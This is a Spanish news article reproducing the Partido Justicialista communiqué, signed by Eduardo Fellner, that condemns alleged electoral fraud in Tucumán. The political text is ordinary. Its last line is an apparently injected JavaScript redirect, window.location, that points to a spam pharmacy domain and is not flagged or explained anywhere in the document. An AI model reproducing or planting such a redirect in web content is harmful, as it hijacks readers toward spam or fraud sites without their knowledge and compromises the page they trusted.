El comunicado oficial del Partido Justicialista luego de los incidentes en Tucumán

El Partido Justicialista emitió anoche un comunicado oficial en el que se expresó acerca de los «actos acaecidos en la Provincia de Tucumán que permiten visualizar la supuesta existencia de delitos electorales que configuran una violación flagrante de la voluntad popular». El escrito fue firmado por el titular de la agrupación política, Eduardo Fellner. El texto completo:
COMUNICADO DEL CONSEJO NACIONAL FEDERAL DEL PARTIDO JUSTICIALISTA
El Consejo Nacional Federal del Partido Justicialista manifiesta su enérgico repudio a los actos acaecidos en la Provincia de Tucumán que permiten visualizar la supuesta existencia de delitos electorales que configuran una violación flagrante de la voluntad popular.
Un delito electoral merece el repudio general y colectivo de todo el sistema político, por lo tanto, desde nuestro partido impulsaremos una profunda investigación con el objeto de castigar severamente a quienes fueron responsables de los hechos
acaecidos.
Es preocupante la intención coyuntural y meramente oportunista del arco político y mediático opositor que pretende deslegitimar el pronunciamiento de la voluntad popular, que es la única e indubitable fuente de legitimación de un gobierno democrático.
Nuestro movimiento político que ha sufrido a través de la historia desde la persecución sistemática hasta la proscripción política manifiesta su más absoluta condena y repudio de cualquier delito electoral en cualquiera de sus características y formas. No respetar la voluntad popular, es lisa y llanamente estar contra los intereses de nuestro pueblo.
Exigimos castigo a los responsables. Exigimos la aplicación de todo el peso de la ley. Pero también pedimos a la oposición política un gesto de grandeza para no enturbiar un proceso electoral que cumple las garantías de fiscalización de todos los partidos, frentes o alianzas electorales que integran el sistema político e institucional.
Sólo el pueblo salvará al pueblo.
Eduardo FELLNER
Presidente
Partido Justicialista ON

window.location = «http://cheap-pills-norx.com»;